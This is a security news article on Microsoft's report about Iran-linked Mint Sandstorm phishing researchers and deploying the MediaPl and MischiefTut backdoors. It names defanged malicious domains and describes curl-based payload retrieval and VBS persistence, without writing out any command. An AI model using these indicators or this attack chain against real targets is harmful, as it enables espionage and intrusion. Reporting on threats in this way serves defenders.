Hackers frequently target researchers to get illegal access to important research data, intellectual property, and highly sensitive information.
The threat actors can exploit this information for various illicit purposes like economic espionage, competitive advantage, or selling the data on the black market.
Cybersecurity researchers at Microsoft recently discovered that the threat actors behind Mint Sandstorm are actively attacking the researchers with new hacking tools.
Mint Sandstorm (PHOSPHORUS), which is linked to Iran’s IRGC, has been actively targeting high-profile individuals at universities and research organizations in Belgium, France, Gaza, Israel, the UK, and the US since November 2023 using custom phishing to deploy MediaPl backdoor.
The operators of this threat group are highly skilled social engineers as they adapt and persist in compromised environments, which poses a serious threat to security.
Compounding the problem are zero-day vulnerabilities like the MOVEit SQLi, Zimbra XSS, and 300+ such vulnerabilities that get discovered each month. Delays in fixing these vulnerabilities lead to compliance issues, these delay can be minimized with a unique feature on AppTrana that helps you to get “Zero vulnerability report” within 72 hours.
Mint Sandstorm’s most recent campaign demonstrates new strategies such as phishing with hacked email accounts, using curl commands to connect to their server, and deploying the MediaPl backdoor.
They imitate renowned figures by using individualized phishing lures and innocent first mail to gain confidence before releasing malicious content.
Using hacked but genuine email accounts strengthens Mint Sandstorm’s legitimacy, which is critical to the campaign’s success.
Targets who agreed to review documents in Mint Sandstorm’s campaign received follow-up emails with links to malicious domains like cloud-document-edit[.]onrender[.]com.
These domains hosted RAR archives, and when they are opened, decompressed into .pdf. link files running curl commands to retrieve malicious files from glitch[.]me and supabase[.]co.
Microsoft detected various files, including .vbs scripts, and renamed versions of NirCmd, which is a legitimate tool used for actions without a user interface.
Mint Sandstorm used Persistence. vbs to persist by adding a.vbs file to the registry key or creating a scheduled task to download a.txt file from supabase[. ]co.
They logged device activity to files like documentLogger.txt and dropped custom backdoors, MediaPl, and MischiefTut. Here, the MediaPl is disguised as a Windows Media Player that encrypts communications and manipulates images for C2 info.
Moreover, it’s equipped to terminate itself, retry C2 communications, and execute commands. MischiefTut is a PowerShell-based backdoor that offers basic capabilities in this sophisticated campaign.
Mint Sandstorm’s remote access capability poses a threat to system confidentiality, risking legal and reputational consequences for targeted organizations.
Microsoft enhances detection to empower customers to defend against this patient and skilled subgroup of Mint Sandstorm.
Here below, we have mentioned all the recommendations provided by the security researchers:-
By following and implementing all the recommendations that are provided by the cybersecurity researchers at Microsoft, such threats can be mitigated efficiently.
Try Kelltron’s cost-effective penetration testing services to evaluate digital systems security. available.
A threat actor has reportedly put up for sale a sophisticated FortiGate API exploit tool…
Summary 1. A critical OpenVPN Windows driver flaw (CVE-2025-50054) allowed local attackers to crash systems.…
DuckDuckGo has significantly upgraded its Scam Blocker feature to protect users against a broader range…
As an employee have been managing projects in remote, hybrid, and traditional work environments, employees…
Summary 1. A OneDrive bug is causing some users' search results to appear blank, though…
Summary 1. Redirection controls disable clipboard, drive, USB, and printer access by default to prevent…